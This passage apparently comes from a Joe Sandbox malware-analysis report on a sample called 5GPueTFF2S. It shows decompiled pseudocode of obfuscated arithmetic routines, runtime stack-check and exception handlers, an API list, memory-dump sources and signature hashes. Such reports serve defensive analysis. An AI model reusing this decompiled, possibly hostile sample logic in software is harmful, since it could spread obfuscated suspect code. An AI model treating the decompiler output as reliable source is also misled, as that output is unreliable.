							 *(_t869 - 2) =  *(_t869 - 2) & 0x000000ff &  *(_t869 - 0x80) & 0x0000ffff |  *(_t869 - 2) & 0x000000ff;
							_t748 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t748;
						}
					}
					 *((char*)(_t869 - 0xdc)) = 0xe5;
					 *((char*)(_t869 - 0xdb)) = 0xdd;
					 *((char*)(_t869 - 0xda)) = 0xe5;
					 *((char*)(_t869 - 0xd9)) = 0xe7;
					 *((char*)(_t869 - 0xd8)) = 0xea;
					 *((char*)(_t869 - 0xd7)) = 0xf1;
					_t401 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t401;
					if(_t401 > _t538) {
						asm("cdq");
						 *0x1000d1c = _t538;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t748;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t869 - 0x58)) =  *((intOrPtr*)(_t869 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t601 =  *(_t869 - 0x40);
					 *(_t869 - 0x38) = _t601 + _t601 + _t601 + _t601 + _t601 + _t601 + _t601 + _t601;
					 *(_t869 - 0x34) = ( *(_t869 - 0x3c) << 0x00000020 | _t601) << 3;
					 *0x10ae368 =  *(_t869 - 0x38);
					_t863 = 0;
					do {
						_t753 =  *(_t869 - 0xb);
						_t911 =  *0x1000c9b - _t753; // -28
						if(_t911 >= 0) {
							if( *(_t869 - 1) == 0) {
								_t405 =  *(_t869 - 0x6c);
								_t850 =  *(_t869 - 0x34);
								asm("cdq");
								__eflags = _t405 -  *(_t869 - 0x38);
								if(_t405 !=  *(_t869 - 0x38)) {
									L101:
									 *(_t869 - 0x90) =  *(_t869 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t869 - 1);
									 *(_t869 - 0x2c) =  *(_t869 - 0x2c) - ( *(_t869 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t869 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t869 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t753 - _t850;
									if(_t753 == _t850) {
										_t631 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t631;
										 *_t631 =  *_t631 + _t405;
										__eflags =  *_t631;
										if( *_t631 != 0) {
											_t854 =  *(_t869 - 0x74);
											_t411 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t633 =  *(_t869 - 0x78) - _t411;
											__eflags = _t633;
											asm("enter 0xfa1b, 0x8b");
											_push(_t869);
											 *0x3DE8FE44 = _t633;
											 *(_t869 - 0x78) = _t633;
											 *(_t869 - 0x74) = _t854 & _t411;
											 *(_t869 - 0xa) = ( *(_t869 - 0xa) & 0x000000ff) + ( *(_t869 - 0x18) & 0x0000ffff);
											_t412 =  *((intOrPtr*)(_t869 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t638 = _t412 +  *0x1000cc8 + 1;
											__eflags = _t638;
											 *0x1000cd4 = _t638;
											 *0x1000cf4 = 0;
											_t413 = _t412 + 0x1000cf4;
											__eflags = _t413;
											 *_t638 =  *_t638 + _t413;
											 *_t413 =  *_t413 + _t413;
											 *_t413 =  *_t413 + _t413;
											__eflags =  *_t413;
										}
									} else {
										goto L101;
									}
								}
							} else {
								_t629 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t415 =  *0x1000d00; // 0xfffff835
								_t790 = _t753 & _t629;
								 *0x1000d00 = E00ECEE50( *(_t869 - 0x1c) & _t415, _t790, _t415, _t629);
								 *0x1000d04 = _t790;
							}
						}
						 *(_t869 + _t863 * 2 - 0x160) = ( *(_t869 + _t863 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t863 = _t863 + 1;
					} while (_t863 < 6);
					_t610 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t869 - 0x70) = _t610 * 0x6eb594ba;
					_t612 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t869 - 0x60);
					_t418 =  *0x1000ce0; // 0x0
					_t759 = _t418 | _t612;
					if(_t759 == 0) {
						 *(_t869 - 0xbc) = 0;
						__eflags =  *(_t869 - 6);
						if( *(_t869 - 6) != 0) {
							_t419 = 0;
							__eflags = 0;
						} else {
							_t419 = 1;
						}
						_t614 =  *0x1000d00 + _t419;
						__eflags = _t614;
						 *(_t869 - 0x24) =  !_t614;
					} else {
						if(_t418 != 1 || _t612 != 0) {
							if(_t418 == 2 && _t612 == 0) {
								_t447 =  *0x1000cdc; // 0x84521e70
								 *(_t869 - 0x60) = ( *(_t869 - 0x68) ^ _t447 ^  *0x1000d00) * (_t447 + 0xffffbb58);
								_t779 =  *0x1000c94; // 0x0
								_t780 = _t779 * 0x2d40daef;
								 *(_t869 - 0x7c) =  *(_t869 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t869 - 0x90) = _t780;
								asm("cdq");
								 *(_t869 - 0x38) = ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff) + ( *(_t869 - 0x84) & 0x0000ffff);
								 *(_t869 - 0x34) = _t780;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t869 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t759;
							 *(_t869 - 0x4c) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t869 - 0x154)) =  ~(( *(_t869 - 0xc4) +  *((intOrPtr*)(_t869 - 0xa4))) *  *(_t869 - 0xc4) *  *(_t869 - 0x14) ^ 0x0000701c);
					_t421 = 0x20b;
					do {
						 *(_t869 - 0xb) =  *(_t869 - 0xb) + 1;
						_t421 = _t421 - 1;
					} while (_t421 > 0);
					_t424 = ( *(_t869 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t424 != 0) {
						_t864 = 0;
						__eflags = 0;
					} else {
						_t301 = _t424 + 1; // 0x20b
						_t864 = _t301;
					}
					asm("cdq");
					_t770 =  *(_t869 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t430 = E00ECEE50(( *(_t869 - 0x18) & 0x0000ffff) + ( *(_t869 - 0xc) & 0x000000ff) + 1,  *(_t869 - 0xc), _t770 +  *0x1000cc0, _t770);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t430 - _t864 | _t770) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t869 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t869 - 0x18) & 0x0000ffff) + 0xf;
						_t439 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t770;
						 *(_t869 - 5) =  *(_t869 - 3) +  *(_t869 - 0x28) + (_t439 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *(_t869 - 0xa0) =  *(_t869 - 0xa0) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t314 = _t869 - 0x160; // 0x60f1ba1c
					_t771 = _t314;
					_t315 = _t869 - 0x1ac; // 0x60f1b9d0
					_t433 = _t315;
					MessageBoxW(GetForegroundWindow(), _t433, _t771, 0x10);
				}
				return 0;
			}

































































































                                              0x00ec6072
                                              0x00ec60b4
                                              0x00ec60ba
                                              0x00ec60cc
                                              0x00ec60d2
                                              0x00ec6132
                                              0x00ec6134
                                              0x00ec613d
                                              0x00ec613d
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6146
                                              0x00ec614f
                                              0x00ec6155
                                              0x00ec6157
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6159
                                              0x00ec6159
                                              0x00ec615b
                                              0x00000000
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615b
                                              0x00ec6169
                                              0x00ec6170
                                              0x00ec6176
                                              0x00ec6179
                                              0x00ec617e
                                              0x00ec6186
                                              0x00ec618b
                                              0x00ec618d
                                              0x00ec6193
                                              0x00ec61f0
                                              0x00ec61f9
                                              0x00ec61f9
                                              0x00ec61fb
                                              0x00ec6206
                                              0x00ec6217
                                              0x00ec6218
                                              0x00ec621e
                                              0x00ec6224
                                              0x00ec6224
                                              0x00ec6227
                                              0x00ec622c
                                              0x00ec622c
                                              0x00ec6195
                                              0x00ec61a4
                                              0x00ec61b2
                                              0x00ec61b3
                                              0x00ec61b9
                                              0x00ec61bf
                                              0x00ec61cc
                                              0x00ec61db
                                              0x00ec61db
                                              0x00ec60e5
                                              0x00ec60f2
                                              0x00ec60f5
                                              0x00ec610e
                                              0x00ec6122
                                              0x00ec6124
                                              0x00ec6124
                                              0x00ec6237
                                              0x00ec6240
                                              0x00ec6243
                                              0x00ec6244
                                              0x00ec624a
                                              0x00ec6254
                                              0x00ec6254
                                              0x00ec624c
                                              0x00ec624c
                                              0x00ec6252
                                              0x00ec625b
                                              0x00ec625b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6252
                                              0x00ec625d
                                              0x00ec626a
                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec6530
                                              0x00ec6537
                                              0x00ec653c
                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6746
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              APIs
                                              • TlsGetValue.KERNEL32(00000001), ref: 00EC6274
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value
                                              • String ID: %GR$RPSQ8~$S$j
                                              • API String ID: 3702945584-3363877662
                                              • Opcode ID: 39157b958a37429ad62788eaf41339a064c083208da2979197dbf1d240ca858c
                                              • Instruction ID: ee0de1a6d7f731af62cc9f2b853375fb3e8a22a55a9ba7b96a264716113b49a4
                                              • Opcode Fuzzy Hash: 39157b958a37429ad62788eaf41339a064c083208da2979197dbf1d240ca858c
                                              • Instruction Fuzzy Hash: 4942D5309042598FCB25CF68D591FFEBBB2FB59340F1491AEE489A734DDA3A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00ECCEC4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00ECCEC4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1000a08; // 0xfaa257e5
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10015b8 = _t6;
				 *0x10015b4 = _t22;
				 *0x10015b0 = _t25;
				 *0x10015ac = _t21;
				 *0x10015a8 = _t27;
				 *0x10015a4 = _t26;
				 *0x10015d0 = ss;
				 *0x10015c4 = cs;
				 *0x10015a0 = ds;
				 *0x100159c = es;
				 *0x1001598 = fs;
				 *0x1001594 = gs;
				asm("pushfd");
				_pop( *0x10015c8);
				 *0x10015bc =  *_t31;
				 *0x10015c0 = _v0;
				 *0x10015cc =  &_a4;
				 *0x1001508 = 0x10001;
				_t11 =  *0x10015c0; // 0x0
				 *0x10014bc = _t11;
				 *0x10014b0 = 0xc0000409;
				 *0x10014b4 = 1;
				_t12 =  *0x1000a08; // 0xfaa257e5
				_v812 = _t12;
				_t13 =  *0x1000a0c; // 0x55da81a
				_v808 = _t13;
				 *0x1001500 = IsDebuggerPresent();
				_push(1);
				E00ECD027(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xfff288);
				if( *0x1001500 == 0) {
					_push(1);
					E00ECD027(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                              0x00eccec4
                                              0x00eccec4
                                              0x00eccec4
                                              0x00eccec4
                                              0x00eccec4
                                              0x00eccec4
                                              0x00eccec4
                                              0x00ecceca
                                              0x00eccecc
                                              0x00eccecc
                                              0x00ece545
                                              0x00ece54a
                                              0x00ece550
                                              0x00ece556
                                              0x00ece55c
                                              0x00ece562
                                              0x00ece568
                                              0x00ece56f
                                              0x00ece576
                                              0x00ece57d
                                              0x00ece584
                                              0x00ece58b
                                              0x00ece592
                                              0x00ece593
                                              0x00ece59c
                                              0x00ece5a4
                                              0x00ece5ac
                                              0x00ece5b7
                                              0x00ece5c1
                                              0x00ece5c6
                                              0x00ece5cb
                                              0x00ece5d5
                                              0x00ece5df
                                              0x00ece5e4
                                              0x00ece5ea
                                              0x00ece5ef
                                              0x00ece5fb
                                              0x00ece600
                                              0x00ece602
                                              0x00ece60a
                                              0x00ece615
                                              0x00ece622
                                              0x00ece624
                                              0x00ece626
                                              0x00ece62b
                                              0x00ece63f

                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00ECE5F5
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ECE60A
                                              • UnhandledExceptionFilter.KERNEL32(00FFF288), ref: 00ECE615
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00ECE631
                                              • TerminateProcess.KERNEL32(00000000), ref: 00ECE638
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 5d2e05d7d52c3523d83c44bb214510889b9ae220dcd3fc16c3854acd03393825
                                              • Instruction ID: b8c51486aede356314d5546c95a76c9f7267206837b96ae2b606f947bb78a3fe
                                              • Opcode Fuzzy Hash: 5d2e05d7d52c3523d83c44bb214510889b9ae220dcd3fc16c3854acd03393825
                                              • Instruction Fuzzy Hash: E821D678804304DFC722DF58E5856543BB4FF08346F585219F48A9B399EBBB9881CF45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC91DC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00EC91DC() {

				SetUnhandledExceptionFilter(E00EC919A);
				return 0;
			}



                                              0x00ec91e1
                                              0x00ec91e9

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000919A), ref: 00EC91E1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: aa25cec5104f3449e399b5771d0296e668efa0725815cbf554792f0ab699ad73
                                              • Instruction ID: efd77d6bda42932381026cb316c2b408976ed40f7b36ccbfefb12193821b70fd
                                              • Opcode Fuzzy Hash: aa25cec5104f3449e399b5771d0296e668efa0725815cbf554792f0ab699ad73
                                              • Instruction Fuzzy Hash: FE90026429220946462427709D0EB1935D56E4970674728546001D4065DE914005A515
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC9FEE Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00EC9FEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0xfff468);
				E00ECA454(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00EC91EA(_t44);
				}
